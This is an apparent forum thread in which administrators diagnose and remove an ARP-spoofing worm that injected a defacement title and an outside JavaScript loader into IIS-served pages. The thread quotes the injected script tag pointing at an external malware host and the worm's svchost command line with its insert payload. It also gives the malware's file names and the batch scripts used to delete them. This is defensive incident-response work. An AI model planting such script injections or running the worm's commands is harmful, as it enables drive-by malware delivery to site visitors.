Go Premium for a chance to win a PS4. Enter to Win

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1592
  • Last Modified:

IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere

Hi, my web servers all iss, have been compromized, we are not sure how although we think it may have been sql injection. the follwoing

Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website.  We cannot clean nor find the source of the spreading.  Here is the Java Source:  <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

i have run spyware scans, virus scans, and cannot determine where the infection is coming from
and i have had to stop my web servers, does anybody have any clue

this is an emergency
0
blueswitch
Asked:
blueswitch
  • 13
  • 11
  • 4
  • +4
1 Solution
 
moorhouselondonCommented:
I'm sure you've done this already, but...

First off, turn off access to your site, noone is going to thank you for screwing up their system.
0
 
blueswitchAuthor Commented:
that has already been done, now im trying anything and anything to find the infection
0
 
moorhouselondonCommented:
Your website has an SQL engine embedded in it?  If so, check that parameters sent to the engine are properly validated.  As I understand it SQL injection is about putting formatting characters into a form.  The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain.  So what you've got to do is to strip out all characters that could setup such a command.
0
WatchGuard Case Study: NCR

With business operations for thousands of customers largely depending on the internal systems they support, NCR can’t afford to waste time or money on security products that are anything less than exceptional. That’s why they chose WatchGuard.

 
blueswitchAuthor Commented:
our problem is that the hack has already happened iis has been compromised
the database and code are ok,

when i move the database and code to a clean server, the site is normal again
so my only conclusion is that the server has somehow been modified, howwver i cant find it
0
 
moorhouselondonCommented:
Have you checked things like Stored Procedures?
0
 
blueswitchAuthor Commented:
no,

but as i mentioned i have physically moved all databse files, as well as the web code to a prviously uninfected machine, and the infection does not follow
also it affects asp pages not using databases, so i have dteremined that it is infecting iis
0
 
moorhouselondonCommented:
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable?  Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
0
 
blueswitchAuthor Commented:
agreed, but for now we nee dto be able to ge tthe sites back up
0
 
moorhouselondonCommented:
not a pleasant Sunday for you...
0
 
blueswitchAuthor Commented:
not at all
0
 
blueswitchAuthor Commented:
interesting

here i think its a variant of those attacks where they managed to get the iis server infected
0
 
blueswitchAuthor Commented:
these are very interesting but  the problem is i have a new variant, and my iis is infected.
im really at a standstill
0
 
moorhouselondonCommented:
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time.  If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
0
 
adds21Commented:
Okay.  We've now fixed out problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey in, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
0
 
moorhouselondonCommented:
Good news indeed.  The SQL coding needs to be reviewed for vulnerabilities, as mentioned.

You shouldn't be running two accounts on EE.  I suggest you do something about that too!
0
 
stephenevansCommented:
Long night indeed, thanks adds21, your post pointed me in the right direction. if you find more information please do post it.  Im backup and running but not sure how, with all the things i tried im not sure what one sorted the issue.
0
 
blueswitchAuthor Commented:
ads 21
what did you find if its on the sql server what was the proces called

what do i look for

0
 
blueswitchAuthor Commented:
i just restarted my sql server , didnt seem to have effect, i didnt see any process
0
 
moorhouselondonCommented:
Blueswitch:-

Are you doing this on the new, uninfected machine, or the infected one?  
0
 
blueswitchAuthor Commented:
on the infected one, i have many web and sql servers, here swhat i have found out so far

1. the infection has some type of logic, as it will not show the profanity in the title  if the ip of the computer browsing the site is on the same subnet as the machine infected

meaning, all local machines on my network do not see the profanity ann all the sites.
this has been verified, by using a load balancer which maskes the user ip wand make sit appear as an internal user., and when i placed an infected machine behind the load balancer the outside world did not see the profanity

2. i think its on the web server and iis not sql, as when i used a clean iis machine, (that has sql installed)
and used that, whil etrasfering the entire dtaabse folder, inluding the master msdb etc, to the is machine from an infected machine, the problem went away

0
 
blueswitchAuthor Commented:
one more thing it only affects port 80
so if the site is under ssl the hack does not take affect
has anybody else been affected
0
 
blueswitchAuthor Commented:
ok

the problem has been resolved,  the problem is on the sql server as posted above. its an arp attack
a sql injection attack installs an executable on one of teh sql servers
that sql server becomes a psudo gateway intercepting all web traffic and appending the code above

it does not modify sql or iis ain any way


0
 
blueswitchAuthor Commented:
additionally, while it may apear many machines are infected, only one is infected, ( a sql server)
and it has some program running that sintercepting the arp traffic and causing all teh problems

isaac
0
 
stephenevansCommented:
As an update, i've been unable to find the source of the SQL Injection but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm i found files relating to the following,

http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html

wpcap.dll and the ohher files can indeed enable an uploaded files to access the network card at the network level and hence mess with ARP and other traffic.

Stephen
0
 
RandyMontgomeryCommented:
blueswitch,

What is the name of the exe.  I still can not find it on any of my servers.
0
 
stephenevansCommented:
The EXE was called wapsrv.exe it had a created date of the 21st, the full list of files that were created are as follows.  

System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
0
 
RTPITCommented:
Thank you stephenevans!   Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
0
 
RTPITCommented:
I found the culprit I made 2 scripts one for 2000 and one for XP/Server

2000.bat
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
0
 
RTPITCommented:
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0
 
RandyMontgomeryCommented:
First of all thank you all for your input.

I checked every server on my network and none of the following files "packet.dll,wanpacket.dll,wapsrv.exe,wpcap.dll,npf.sys and waptimes.exe" were found on my servers.  Also checked my process's using ProcessExplorer on each server and did not find anything abnormal.  The virus seems to come and go and when it's active is severally slows down the internet and LAN/WAN traffic.  I even tried wireshark to find the misc traffic from each server.  Symantec stops the VIP.js and its other names on the workstations.  Any of your admin's running Symantec end point protection on your network?  Any other comments, ideas, thoughts to radiate this bug?
0
 
RTPITCommented:
It doesn't have to be a server, the machine that we ended up finding it running on was a XP client PC.

If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router.  Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
0
 
RandyMontgomeryCommented:
I was under the impression that it was a server virus, thanks for information.  What anti-virus software are you running on the workstations?
0
 
Mohamed OsamaSenior IT ConsultantCommented:
For the sake of Google & Search engines

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99


this is the original Culprit, a Low profile worm that injects malicious HTML code into local HTTP traffic, using ARP poisoning attacks , the IFrames injected differ, but the payload is usually executing  JS / VBS trojan downloaders , Mcafee detects it as Trojan VBS/ PSYME , Kaspersky detects it as Trojan-Downloader.JS.Multi.cn
upon execution this will download further Malwarem, some of them were extremely difficult to remove.

I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands on cleanup, once cleaned, other users who experienced the VBS/PSYME message
0

Featured Post

When ransomware hits your clients, what do you do?

MSPs: Endpoint security isn’t enough to prevent ransomware.
As the impact and severity of crypto ransomware attacks has grown, Webroot has fought back, not just by building a next-gen endpoint solution capable of preventing ransomware attacks but also by being a thought leader.

  • 13
  • 11
  • 4
  • +4
Tackle projects and never again get stuck behind a technical roadblock.
Join Now